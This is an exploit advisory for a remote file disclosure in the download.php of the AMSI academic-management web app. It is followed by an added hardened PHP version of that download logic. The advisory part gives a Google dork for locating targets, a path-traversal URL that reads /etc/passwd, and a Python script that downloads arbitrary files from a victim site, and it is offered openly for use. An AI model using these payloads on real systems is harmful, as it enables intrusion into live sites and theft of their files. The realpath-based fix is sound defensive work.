`
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] Exploit Developed by : B3mB4m
[~] HomePage : http://h4x0resec.blogspot.com
[~] Beautiful People : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork : inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
The flaw in 'download.php' makes it possible to read files from the server's local file system.
#######################################################
### Error Line in 'download.php' ##
..
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);
// $path = $_GET['file'];
header("Content-Description: File Transfer");
header("Content-Type: application/force-download");
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );
@readfile($path);
..
########################################################
Example and tested on;
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################
# Coded by b3mb4m
import random
import os
import urllib

class B3mB4m(object):
    def example(self):
        print """
How to use ?
Website: http://VICTIM.com
Path : /download.php?file=../../../../etc/passwd
"""

    def exploit(self):
        ask = raw_input("Website :")
        uz = raw_input("Path : ")
        #ask = "http://alnashaa.sch.ae"
        #uz = "/download.php?file=../../../../etc/passwd"
        uniq = str(random.randrange(1,1000+1))+".txt"
        filee = ask+uz
        try:
            urllib.urlretrieve(filee, uniq);
            print "\t\nDownload complete ! "
            os.startfile(uniq)
        except:
            B3mB4m().example()

if __name__ == '__main__':
    B3mB4m().exploit()
`
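A hardened form of the 'download.php' logic quoted in the "Error Line" section, where the request string goes straight into readfile(). This is an added example, not code from the advisory or from the vendor; DOWNLOAD_ROOT and resolve_download() are assumed names, and the application's real download directory is not given on the page.

```php
<?php
// Added example, not the vendor's code. DOWNLOAD_ROOT is an assumed path.
const DOWNLOAD_ROOT = '/var/www/app/uploads';

// Map a user-supplied name to a regular file strictly inside $root.
// Returns the canonical path, or null when the request must be refused.
function resolve_download(string $root, $requested): ?string
{
    // Reject arrays (file[]=x), empty names and NUL bytes up front.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() resolves "../" sequences and symlinks to one canonical path.
    $full = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // The canonical path must still begin with "<root>/"; the trailing
    // separator stops a sibling such as "<root>_backup" from matching.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Use the parsed query parameter, never the raw REQUEST_URI string.
$file = resolve_download(DOWNLOAD_ROOT, $_GET['file'] ?? null);
if ($file === null) {
    http_response_code(404);
    exit;
}
// Strip characters that could break out of the quoted filename parameter.
$name = str_replace(['"', '\\'], '_', basename($file));
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . filesize($file));
readfile($file);
```

With this check in place, a request such as the advisory's file=../../../../etc/passwd canonicalizes to a path outside DOWNLOAD_ROOT and is answered with a 404.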